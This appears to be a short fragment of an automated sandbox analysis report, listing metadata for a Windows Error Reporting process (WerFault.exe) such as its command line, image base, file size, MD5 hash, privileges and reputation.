                                          Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
                                          Imagebase: 0xa50000
                                          File size: 483'680 bytes
                                          MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: high
                                          Has exited: true
